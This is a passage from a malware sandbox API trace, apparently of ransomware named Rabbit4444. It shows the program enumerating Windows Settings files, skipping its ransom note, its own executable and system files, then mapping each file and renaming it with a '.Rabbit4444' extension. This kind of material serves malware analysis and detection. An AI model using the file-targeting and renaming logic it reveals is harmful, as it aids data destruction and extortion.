"c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_pcsystem_activatewindowslicense.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.758] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.758] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14906861703) returned 1 [0057.758] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1287) returned 1 [0057.758] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0057.758] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0057.758] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x810, lpName=0x0) returned 0x298 [0057.760] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x810) returned 0x70000 [0057.761] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.761] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0057.761] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.761] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0057.761] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.761] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0057.761] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.761] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0057.761] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14907202936) returned 1 [0057.761] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0057.761] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0057.761] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.761] CloseHandle (hObject=0x298) returned 1 [0057.762] CloseHandle (hObject=0x278) returned 1 [0057.762] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_ActivateWindowsLicense.settingcontent-ms.Rabbit4444") returned 196 [0057.762] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_ActivateWindowsLicense.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_pcsystem_activatewindowslicense.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_ActivateWindowsLicense.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_pcsystem_activatewindowslicense.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.762] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31897f18, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x31897f18, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2340c766, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4c6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_PCSystem_GetPCName.settingcontent-ms", cAlternateFileName="AAFFA7~1.SET")) returned 1 [0057.769] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_GetPCName.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.769] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_GetPCName.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.769] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_GetPCName.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.769] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_GetPCName.settingcontent-ms", lpString2=".") returned 1 [0057.769] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_GetPCName.settingcontent-ms", lpString2="..") returned 1 [0057.769] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_GetPCName.settingcontent-ms", lpString2="windows") returned -1 [0057.769] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_GetPCName.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.769] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_GetPCName.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.769] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_GetPCName.settingcontent-ms", lpString2="boot") returned -1 [0057.769] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_GetPCName.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.769] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_GetPCName.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.769] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_PCSystem_GetPCName.settingcontent-ms" | out: lpString1="AAA_SystemSettings_PCSystem_GetPCName.settingcontent-ms") returned="AAA_SystemSettings_PCSystem_GetPCName.settingcontent-ms" [0057.769] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_GetPCName.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.769] lstrlenW (lpString="AAA_SystemSettings_PCSystem_GetPCName.settingcontent-ms") returned 55 [0057.769] lstrlenW (lpString="Rabbit4444") returned 10 [0057.769] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.769] lstrlenW (lpString=".dll") returned 4 [0057.769] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.769] lstrlenW (lpString=".lnk") returned 4 [0057.769] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.769] lstrlenW (lpString=".ini") returned 4 [0057.769] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.769] lstrlenW (lpString=".sys") returned 4 [0057.769] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.770] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_GetPCName.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_pcsystem_getpcname.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.770] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.770] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14908054314) returned 1 [0057.770] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1222) returned 1 [0057.770] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0057.770] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0057.770] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7d0, lpName=0x0) returned 0x298 [0057.771] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7d0) returned 0x70000 [0057.772] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.772] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0057.772] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.772] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0057.772] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.772] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0057.772] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.772] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0057.772] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14908287145) returned 1 [0057.772] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0057.772] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0057.772] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.772] CloseHandle (hObject=0x298) returned 1 [0057.772] CloseHandle (hObject=0x278) returned 1 [0057.772] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_GetPCName.settingcontent-ms.Rabbit4444") returned 183 [0057.772] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_GetPCName.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_pcsystem_getpcname.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_GetPCName.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_pcsystem_getpcname.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.773] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31a87db3, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x31a87db3, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x238ab028, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4f3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_PCSystem_InstalledRamStatus.settingcontent-ms", cAlternateFileName="AAEEB2~1.SET")) returned 1 [0057.773] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_InstalledRamStatus.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.773] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_InstalledRamStatus.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.773] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_InstalledRamStatus.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.773] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_InstalledRamStatus.settingcontent-ms", lpString2=".") returned 1 [0057.773] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_InstalledRamStatus.settingcontent-ms", lpString2="..") returned 1 [0057.773] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_InstalledRamStatus.settingcontent-ms", lpString2="windows") returned -1 [0057.773] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_InstalledRamStatus.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.773] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_InstalledRamStatus.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.773] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_InstalledRamStatus.settingcontent-ms", lpString2="boot") returned -1 [0057.773] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_InstalledRamStatus.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.773] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_InstalledRamStatus.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.774] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_PCSystem_InstalledRamStatus.settingcontent-ms" | out: lpString1="AAA_SystemSettings_PCSystem_InstalledRamStatus.settingcontent-ms") returned="AAA_SystemSettings_PCSystem_InstalledRamStatus.settingcontent-ms" [0057.774] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_InstalledRamStatus.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.774] lstrlenW (lpString="AAA_SystemSettings_PCSystem_InstalledRamStatus.settingcontent-ms") returned 64 [0057.774] lstrlenW (lpString="Rabbit4444") returned 10 [0057.774] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.774] lstrlenW (lpString=".dll") returned 4 [0057.774] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.774] lstrlenW (lpString=".lnk") returned 4 [0057.774] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.774] lstrlenW (lpString=".ini") returned 4 [0057.774] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.774] lstrlenW (lpString=".sys") returned 4 [0057.774] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.774] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_InstalledRamStatus.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_pcsystem_installedramstatus.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.774] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.774] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14908514819) returned 1 [0057.774] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1267) returned 1 [0057.775] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0057.775] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0057.775] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x800, lpName=0x0) returned 0x298 [0057.776] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x800) returned 0x70000 [0057.777] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.777] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0057.777] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.777] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0057.777] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.777] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0057.777] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.777] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0057.777] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14908790590) returned 1 [0057.777] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0057.777] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0057.777] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.777] CloseHandle (hObject=0x298) returned 1 [0057.777] CloseHandle (hObject=0x278) returned 1 [0057.777] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_InstalledRamStatus.settingcontent-ms.Rabbit4444") returned 192 [0057.778] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_InstalledRamStatus.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_pcsystem_installedramstatus.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_InstalledRamStatus.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_pcsystem_installedramstatus.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.778] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31bb9033, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x31bb9033, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2398fe3f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_PCSystem_JoinCloudDomain.settingcontent-ms", cAlternateFileName="AAB7CB~1.SET")) returned 1 [0057.778] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_JoinCloudDomain.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.778] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_JoinCloudDomain.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.778] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_JoinCloudDomain.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.778] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_JoinCloudDomain.settingcontent-ms", lpString2=".") returned 1 [0057.778] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_JoinCloudDomain.settingcontent-ms", lpString2="..") returned 1 [0057.778] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_JoinCloudDomain.settingcontent-ms", lpString2="windows") returned -1 [0057.779] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_JoinCloudDomain.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.779] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_JoinCloudDomain.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.779] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_JoinCloudDomain.settingcontent-ms", lpString2="boot") returned -1 [0057.779] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_JoinCloudDomain.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.779] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_JoinCloudDomain.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.779] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_PCSystem_JoinCloudDomain.settingcontent-ms" | out: lpString1="AAA_SystemSettings_PCSystem_JoinCloudDomain.settingcontent-ms") returned="AAA_SystemSettings_PCSystem_JoinCloudDomain.settingcontent-ms" [0057.779] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_JoinCloudDomain.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.779] lstrlenW (lpString="AAA_SystemSettings_PCSystem_JoinCloudDomain.settingcontent-ms") returned 61 [0057.779] lstrlenW (lpString="Rabbit4444") returned 10 [0057.779] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.779] lstrlenW (lpString=".dll") returned 4 [0057.779] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.779] lstrlenW (lpString=".lnk") returned 4 [0057.779] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.779] lstrlenW (lpString=".ini") returned 4 [0057.779] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.779] lstrlenW (lpString=".sys") returned 4 [0057.779] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.779] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_JoinCloudDomain.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_pcsystem_joinclouddomain.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.780] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.780] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14909049979) returned 1 [0057.780] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1252) returned 1 [0057.780] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0057.780] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0057.780] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7f0, lpName=0x0) returned 0x298 [0057.781] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7f0) returned 0x70000 [0057.782] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.782] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0057.782] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.782] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0057.782] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.782] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0057.782] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.782] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0057.782] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14909298504) returned 1 [0057.782] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0057.782] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0057.782] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.782] CloseHandle (hObject=0x298) returned 1 [0057.782] CloseHandle (hObject=0x278) returned 1 [0057.783] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_JoinCloudDomain.settingcontent-ms.Rabbit4444") returned 189 [0057.783] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_JoinCloudDomain.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_pcsystem_joinclouddomain.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_JoinCloudDomain.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_pcsystem_joinclouddomain.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.784] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x320579d1, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x320579d1, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x238ab028, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4cb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_PCSystem_JoinDomain.settingcontent-ms", cAlternateFileName="AA7198~1.SET")) returned 1 [0057.784] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_JoinDomain.settingcontent-ms", lpString2="HOW TO BACK YOUR 